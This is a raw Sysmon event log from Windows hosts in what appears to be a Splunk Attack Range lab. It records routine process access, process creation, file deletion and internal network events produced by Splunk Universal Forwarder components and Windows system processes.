10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0EB9-6216-0704-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.317{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EB9-6216-0704-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.318{4F8D34B0-0EB9-6216-0704-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:50.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B37293ED01444FD21AB05306E91E2343,SHA256=E4B18EF493F292722A349E1B70F2B6C38C2DD625E5021F37C18B4BE49B062524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:50.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=008C445011D5F71046385A24A77BDD4A,SHA256=4FC732B56AE376BCA1ABB7EECC2E2EB8E9B5CA744CCDA402764E328D3E555654,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:50.224{4F8D34B0-0EB9-6216-0804-000000003902}35162844C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.989{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EB9-6216-0804-000000003902}3516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:51.276{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1CA256745C03F9CE665D1EFF98620C2,SHA256=E65D174A96FFF0AEA918F54EEF9C75A58172F369C91792AB7827CCDF14752923,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:49.522{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51199-false10.0.1.12-8000- 10341000x8000000000000000214619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EBB-6216-0904-000000003902}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214612Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214611Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214610Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0EBB-6216-0904-000000003902}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.567{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EBB-6216-0904-000000003902}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.569{4F8D34B0-0EBB-6216-0904-000000003902}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:51.051{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2B33D58EBE4C850934F15F5AB28ECC8,SHA256=A612D5BAC7C41218FA91AF35CAFCE14D8F23BE7834B682D9BE5CB689086B11C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:52.541{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9C632E5B95FAD2C77D04C7AF5AC043E,SHA256=F3E1F92FBA943FBFEBB9086C6A880873E26E9FBBE56800C2F9D937AC71029A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:52.541{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F028842EE8371753F5BE6FF387FF0ACB,SHA256=E665267D87159B50142E00E670A2FB8554A65437FD1D59E6E119BBCA847093C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:52.338{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038345AA76A57975AC70D75FD2E73656,SHA256=BF7B02CBB5929EAAA938B0A332FA2F4D66DDF8C686FB634D3924D7F9EAEE306F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:52.614{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8638D08B64566CA53248475924B84090,SHA256=0E68F392C5A56604E61A08BCAD301DF6DF118FAC252625CCCBC4336894781E8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:52.083{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4583A4E0EB9A525DCA6D76A74C6A1B4,SHA256=375FE538444DBEDEBD37F2DCD24DB7FFC226E43699E5216724BF271C689ECD98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:53.369{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF7F3259DAD88A9D9232770557F51C1E,SHA256=84AEF0CA8D388523B4E65A2E15F55F3A919CFB276C3DC916D3482A91E41B9E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:53.098{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE6C71281615107963B85673B425DBE8,SHA256=F9D2B0EF94DC488A05F12D7F021A3CA118C21F05594FE4FFEA9A45E99A87B708,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:49.658{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53260-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:54.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246D68AD9F7BA74D3F29CAF19C8451EF,SHA256=34C8D16FCAA20B9BC2239AC715E78111B9605DAFA3E98D3AFF7A6BC291037AA2,IMPHASH=00000000000000000000000000000000falsetrue 